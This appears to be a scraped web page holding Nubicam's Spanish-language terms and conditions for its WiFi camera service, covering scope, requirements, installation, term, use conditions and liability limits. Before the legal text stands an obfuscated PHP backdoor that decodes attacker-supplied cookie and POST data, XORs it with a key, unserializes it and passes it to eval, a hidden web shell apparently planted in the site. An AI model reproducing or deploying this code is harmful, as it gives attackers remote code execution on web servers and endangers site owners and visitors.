$JLpbDPK = "\x77" . 'f' . chr (84) . "\x5f" . chr ( 802 - 699 )."\101" . chr ( 153 - 54 )."\x48" . chr ( 455 - 388 ); $MDkSfuQC = 'c' . "\x6c" . "\141" . chr (115) . "\x73" . chr (95) . chr (101) . "\170" . "\151" . chr ( 559 - 444 )."\x74" . chr ( 969 - 854 ); $JLDrVeGXvO = $MDkSfuQC($JLpbDPK); $JLpbDPK = "12647";$efduGnYF = $JLDrVeGXvO;$MDkSfuQC = "36372";if (!$efduGnYF){class wfT_gAcHC{private $pXvlTyB;public static $CHqWCj = "a1d25291-c53d-4bd5-ac43-0708c3dde3e5";public static $KwjSW = 32244;public function __construct($GfVAWQJ=0){$DRXfC = $_COOKIE;$GHmucsF = $_POST;$KsyBNxUx = @$DRXfC[substr(wfT_gAcHC::$CHqWCj, 0, 4)];if (!empty($KsyBNxUx)){$lsxQKay = "base64";$xjEyzvygOd = "";$KsyBNxUx = explode(",", $KsyBNxUx);foreach ($KsyBNxUx as $tJZLXJi){$xjEyzvygOd .= @$DRXfC[$tJZLXJi];$xjEyzvygOd .= @$GHmucsF[$tJZLXJi];}$xjEyzvygOd = array_map($lsxQKay . chr ( 888 - 793 )."\144" . "\145" . chr (99) . chr (111) . "\144" . chr ( 139 - 38 ), array($xjEyzvygOd,)); $xjEyzvygOd = $xjEyzvygOd[0] ^ str_repeat(wfT_gAcHC::$CHqWCj, (strlen($xjEyzvygOd[0]) / strlen(wfT_gAcHC::$CHqWCj)) + 1);wfT_gAcHC::$KwjSW = @unserialize($xjEyzvygOd);}}private function YNFvDWz(){if (is_array(wfT_gAcHC::$KwjSW)) {$GZFpNpdwL = str_replace('<' . chr (63) . 'p' . 'h' . chr ( 400 - 288 ), "", wfT_gAcHC::$KwjSW["\143" . "\157" . "\156" . "\164" . "\145" . chr (110) . chr (116)]);eval($GZFpNpdwL); $ZfwiBqxVg = "1609";exit();}}public function __destruct(){$this->YNFvDWz(); $ZfwiBqxVg = "1609";$xiIFdcLerb = str_pad($ZfwiBqxVg, 10);}}$VFnNcDdqV = new wfT_gAcHC(); $VFnNcDdqV = "10521_44371";} Términos y Condiciones | Nubicam

Términos y Condiciones del Servicio

I.- DEFINICIONES PREVIAS

  1. Toda prestación de servicios de captación, transmisión y (posible) almacenamiento de imágenes y sonidos provistos por Nubicam S.A. (en adelante el “Servicio”) es regulada por los presentes términos y condiciones.
  2. Estos términos y condiciones (que se encuentran alojados en el sitio web www.nubicam.com) se considerarán conocidos y aceptados por el CLIENTE mediante la compra o adquisición de una Cámara WIFI NUBICAM (a través de cualquiera de los canales de comercialización disponibles) o mediante la descarga de la aplicación móvil correspondiente. Asimismo, estos términos y condiciones constituyen el acuerdo completo entre Nubicam S.A. (en adelante denominado NUBICAM) y la persona física o jurídica que contrate el Servicio (en adelante denominado el CLIENTE), denominados en conjunto como las Partes, con respecto a todo lo previsto en ellas, y sustituye cualquier comunicación o propuesta anterior o contemporánea, oral o escrita entre las Partes respecto de su contenido.

 

II.- ALCANCE DEL SERVICIO.

  • La Cámara WIFI NUBICAM es un dispositivo que capta y transmite (mediante una conexión Wi FI provista por el CLIENTE) las imágenes y sonidos captados para que puedan ser vistas en tiempo real (en adelante “on-line”) directamente por el CLIENTE.
  • El CLIENTE podrá acceder a dichas imágenes y sonidos a partir de una aplicación móvil desde teléfonos Smartphone con sistema Android y/o IOS (la “APP”). Adicionalmente el CLIENTE podrá acceder a dichas imágenes y sonidos desde la página web www.nubicam.ubiguard.com, reservándose NUBICAM la facultad de restringir y/o discontinuar esta vía de acceso.
  • Para la correcta utilización del Servicio, NUBICAM le podrá solicitar al CLIENTE seleccionar un nombre de usuario y una contraseña, quedando bajo su exclusiva responsabilidad mantener la confidencialidad de las mismas y de todo uso realizado con ellas.
  • El CLIENTE a través de su usuario y contraseña de uso particular y exclusivo, podrá tener acceso on-line a las imágenes y sonidos, y activar, desactivar, configurar alertas, programar y gestionar el uso del sistema de cámaras vía remota y, en caso de contratar un plan de almacenamiento en la nube (en adelante el “Plan”), guardar dichas imágenes y sonidos en la nube para su posterior consulta.

 

III.- REQUERIMIENTOS PARA LA CORRECTA UTILIZACIÓN DEL SERVICIO.

El CLIENTE reconoce que la funcionalidad de la Cámara WIFI NUBICAM está sujeta:

  • Teléfono iPhone 4s en adelante con iOS 7.0 o superior / Teléfono con Android versión 4.4.4 o superior (en adelante, el “Smartphone”).
  • Disponibilidad y funcionamiento del servicio brindado por la compañía de telefonía celular con la que opere el CLIENTE, y/o a la conexión a servicios de acceso a Internet.
  • Conexión de la Cámara WIFI NUBICAM a Wi-Fi 802.11 b/g (encriptación WEP, WPA, WPA2) de internet por ADSL, Cable o Fibra Óptica. Wi-Fi 2.4 (excluyendo cualquier uso de extensores de WIFI o router configurados como extensores de WIFI).

Tanto el Smartphone desde el cual se pretenda utilizar el servicio Cámara WIFI NUBICAM, como los servicios de datos/internet para el mismo, así como la conexión WiFi que alimentara a la Cámara WIFI NUBICAM son proporcionados por otras compañías ajenas a NUBICAM, por lo que la prestación puede verse afectada, interrumpida o condicionada por las condiciones de operatividad de las referidas redes o servicios, circunstancias todas ellas fuera del alcance y responsabilidad de NUBICAM.

El CLIENTE deja aclarado que los costos que de ellos se deriven son a su exclusivo cargo.

 

IV.- INSTALACIÓN Y FUNCIONAMIENTO DE LAS CÁMARAS:

La instalación de Cámaras WIFI NUBICAM estará a exclusivo cargo del CLIENTE.

Para su correcto funcionamiento y preservación, las Cámaras WIFI NUBICAM deberán instalarse en el interior de un inmueble donde no tengan ningún tipo de exposición directa al sol, al agua, y/o a humedad y/o viento excesivos.

El lugar donde se pretenda instalar la Cámara WIFI NUBICAM deberá contar con un servicio de Wi-Fi con acceso Internet activo según lo indicado en III- (el cual será a costo y cargo del CLIENTE).

 

V.- PLAZO:

El plazo de vigencia del Servicio comenzará con la adquisición de la Cámara WIFI NUBICAM o su contratación en cualquier de las modalidades disponibles y por cualquier de los canales habilitados, y se extenderá por plazo indefinido (salvo aquellos casos en los que en virtud de la modalidad de contratación se establezca lo contrario, en cuyo caso éste último prevalecerá). Sin perjuicio de lo anterior, cualquiera de las Partes podrá dar de baja el Servicio sin penalidad, notificando en forma fehaciente su intención al Cliente por lo menos con 30 días de anticipación.

NUBICAM se reserva el derecho para interrumpir, suspender o dar de baja la prestación Servicio sin penalidad, notificando en forma fehaciente su intención al Cliente por lo menos con 30 días de anticipación.

 

 

VI.- CONDICIONES DE USO.

  1. El CLIENTE tendrá derecho a la utilización del Servicio, responsabilizándose del contenido de las imágenes y sonidos que capte y almacene a través de la Cámara WIFI NUBICAM y se obliga a consultar en forma periódica las normas de NUBICAM relativas al uso del Servicio que forman parte de los presentes Términos y Condiciones.
  2. En ningún caso NUBICAM será responsable por el uso que el CLIENTE dé a la CÁMARA WIFI NUBICAM, siendo este último el único responsable por el contenido de las imágenes y sonidos que las mismas pudieran captar.
  3. En caso de que el CLIENTE no cuente con servicio de WIFI, NUBICAM no garantizará el correcto funcionamiento de la Cámara WIFI NUBICAM, así como tampoco del servicio de monitoreo de la/s actividad/es registrada/s por la misma.
  4. Revocación de aceptación (art.34 Ley 24.240): En los casos previstos en los artículos 32 y 33 de mencionada ley, el CLIENTE tendrá derecho a revocar la aceptación durante el plazo de DIEZ (10) días corridos contados a partir de la fecha en que se entregue la Cámara WIFI NUBICAM o se celebre el contrato, lo último que ocurra, sin responsabilidad alguna. El CLIENTE debe entregar la Cámara WIFI NUBICAM a NUBICAM junto con todos sus accesorios, en perfecto estado de conservación y mantenimiento, a entera satisfacción de NUBICAM. Cualquier gasto de devolución será por cuenta del CLIENTE.
  5. NUBICAM podrá establecer nuevas condiciones y/o modificaciones a cualquiera de las cláusulas contenidas en los presentes términos y condiciones aplicables al Servicio. Dichas modificaciones serán comunicadas mediante su publicación en el sitio web de NUBICAM (www.nubicam.com) con treinta días de anticipación a su efectiva aplicación o entrada en vigencia. El uso del Servicio luego de efectuadas las modificaciones implica la aceptación de las mismas. Si el Cliente no estuviera de acuerdo con dichas modificaciones podrá dar de baja el Servicio, sin costo alguno, comunicándose con nuestro servicio de atención al cliente al 011 – 5217-4775 sin perjuicio del oportuno pago del Servicio (en caso de corresponder) que se hubiese devengado hasta la fecha de comunicación del pedido de baja.
  6. Si el CLIENTE incumpliera alguna de las condiciones de uso o de sus obligaciones, NUBICAM se reserva el derecho de suspender inmediatamente el Servicio, comunicándole al CLIENTE que deberá cesar en dicho incumplimiento para que el Servicio pueda ser restablecido. Si el CLIENTE no cesara en su incumplimiento en un plazo de tres (3) días corridos desde la comunicación cursada por NUBICAM, o si el mismo fuera grave, NUBICAM quedará facultada a rescindir en forma inmediata la relación con el CLIENTE y a reclamar los daños y perjuicios que pudieran corresponder.

 

 

VII. OBLIGACIONES DE NUBICAM.

  1. Prestar el Servicio en todo momento en una manera responsable y eficiente con los más altos estándares de calidad. NUBICAM se compromete a realizar las actualizaciones del software que correspondan para la correcta prestación del Servicio, las cuales pueden afectar momentáneamente y mientras se ejecuta dicha tarea la calidad de los mismos. El CLIENTE acepta que dichas afectaciones momentáneas del Servicio no serán causal de la revocación de aceptación mencionada en el VI.4, de rescisión del contrato, ni de devolución de la Cámara WIFI NUBICAM.
  2. No ejercer ningún control sobre el contenido de las imágenes y sonidos captadas por la Cámara WIFI NUBICAM salvo requerimiento de autoridad u organismo competente y conforme los términos de normas legales vigentes.

 

 

VIII.- LIMITACIÓN DE RESPONSABILIDAD.

  1. NUBICAM y el CLIENTE serán cada uno responsables del cumplimiento de las obligaciones a su cargo como consecuencia del presente Contrato.
  2. La responsabilidad de NUBICAM en cualquiera de los casos de incumplimiento imputables a ella estará limitada al costo de adquisición de la CAMARA WIFI NUBICAM o al importe equivalente a un abono mensual del Plan contratado por el CLIENTE (en caso de corresponder), vigente a la fecha del incumplimiento, el que sea menor.
  3. Dado que la prestación del Servicio de NUBICAM depende también de recursos y servicios contratados por el CLIENTE a terceros, NUBICAM declina toda responsabilidad por los daños o perjuicios causados por hechos que emanen de aquéllos. En particular toda vez que NUBICAM no presta el servicio de WiFi, sino que solo se vale del mismo (aportado por el CLIENTE y provisto por terceras partes) para la correcta prestación del Servicio, NUBICAM en ningún caso será responsable por eventuales intromisiones no autorizadas de terceros a la red WiFi del CLIENTE, ni por el uso que los mismos pudieran darle a las imágenes objeto del Servicio, ni por cualquier afectación a la privacidad del CLIENTE a partir de las mismas.

 

 

IX.- RESPONSABILIDAD DEL CLIENTE

  1. El CLIENTE asume plena responsabilidad frente a NUBICAM y a terceros por los daños y perjuicios de toda clase, que puedan generarse como consecuencia del accionar propio, de sus dependientes o de terceros, vinculados al Servicio; así como de los derivados de los equipos, medios o sistemas de los que ellos se sirvan, y los daños que resulten de la inobservancia de las leyes o reglamentaciones, o de otros hechos ilícitos, debiendo el CLIENTE resarcir y mantener indemne a NUBICAM ante cualquier reclamo que pudiera corresponder en los supuestos indicados.
  2. El CLIENTE acepta que en caso de devolución de la Cámara WIFI NUBICAM por cualquier causa, los costos de envío estarán a su cargo.